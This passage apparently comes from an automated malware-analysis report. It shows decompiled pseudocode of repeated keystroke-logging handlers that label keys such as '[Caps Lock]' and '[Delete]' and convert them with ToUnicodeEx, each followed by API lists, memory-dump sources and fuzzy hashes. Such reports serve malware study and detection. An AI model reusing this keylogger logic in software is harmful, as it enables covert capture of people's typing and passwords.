                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}














                  • Address column (detached from the listing above by extraction): the handler enters at 0x10007310, spends its first bytes (0x10007310..0x10007317) setting up the key label, then continues at 0x100076f0 in the body shared by the neighbouring key handlers, ending at 0x100078b6.

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Tab]
                  • API String ID: 783433895-199360412
                  • Opcode ID: a785524ab226e4e94283a726cfb6f81e18d137b6129507000f7a99f762322629
                  • Instruction ID: 2d267a324e9484a07124ea1970936e27bf22569b5696d9d4b95596e51c586869
                  • Opcode Fuzzy Hash: a785524ab226e4e94283a726cfb6f81e18d137b6129507000f7a99f762322629
                  • Instruction Fuzzy Hash: 5C31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007321(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Zoom]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}














                  • Address column (detached from the listing above by extraction): the handler enters at 0x10007321, spends its first bytes (0x10007321..0x10007328) setting up the key label, then continues at 0x100076f0 in the body shared by the neighbouring key handlers, ending at 0x100078b6.

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Zoom]
                  • API String ID: 783433895-3055259814
                  • Opcode ID: c86214f759ae3126244a3cd9606ceefeacbd963b4d36a47ee78664366667e26b
                  • Instruction ID: c5f0f41a8bcff8c1d7aba9d7791743940dec5144013e653b87fb915418b11de3
                  • Opcode Fuzzy Hash: c86214f759ae3126244a3cd9606ceefeacbd963b4d36a47ee78664366667e26b
                  • Instruction Fuzzy Hash: 4331C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007332(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Accept]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}














                  • Address column (detached from the listing above by extraction): the handler enters at 0x10007332, spends its first bytes (0x10007332..0x10007339) setting up the key label, then continues at 0x100076f0 in the body shared by the neighbouring key handlers, ending at 0x100078b6.

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Accept]
                  • API String ID: 783433895-902341990
                  • Opcode ID: 061c268dcb76f09fc094880b4e13fa08ad57f8be8229b2d86ba77c075008c1be
                  • Instruction ID: d2ccba2c791f0b7862c28547fcae4e8d4588ca6c664595fde746ffb7111930bd
                  • Opcode Fuzzy Hash: 061c268dcb76f09fc094880b4e13fa08ad57f8be8229b2d86ba77c075008c1be
                  • Instruction Fuzzy Hash: 7831C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECAB8EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007343(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Context Menu]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Context Menu]
                  • API String ID: 783433895-1701729690
                  • Opcode ID: 5d34866b129b1461d8c55ee51f28b427d56f46fb75139132869c509ee41a27b4
                  • Instruction ID: 9c56b4dc1bb70802c6b761373c7da6d8c422a16c06a74f10d60259aa3dc6bda0
                  • Opcode Fuzzy Hash: 5d34866b129b1461d8c55ee51f28b427d56f46fb75139132869c509ee41a27b4
                  • Instruction Fuzzy Hash: E531C2B8F042545BF722C7658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45C761
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007354(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Caps Lock]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Caps Lock]
                  • API String ID: 783433895-928131802
                  • Opcode ID: 490ffde09bfcbb988d4b6b8e85d853c254a7b6d763ca68262fef91c207acda70
                  • Instruction ID: 1db21de267972ec542353e6ccb0e08bd67032bee9118580e561326deec9e72ff
                  • Opcode Fuzzy Hash: 490ffde09bfcbb988d4b6b8e85d853c254a7b6d763ca68262fef91c207acda70
                  • Instruction Fuzzy Hash: 2231C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007365(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Delete]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Delete]
                  • API String ID: 783433895-1730770369
                  • Opcode ID: 400296010eaf9738d0fbc21618fd4f91ee1e467b3b431434bb3075d31a3e91e2
                  • Instruction ID: bb44ce128919629e04e34867fdffb35d74004a6f3688c35cfe140960795f1254
                  • Opcode Fuzzy Hash: 400296010eaf9738d0fbc21618fd4f91ee1e467b3b431434bb3075d31a3e91e2
                  • Instruction Fuzzy Hash: 5C31C0B8F042545BF722CB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007376(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[Arrow Down]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
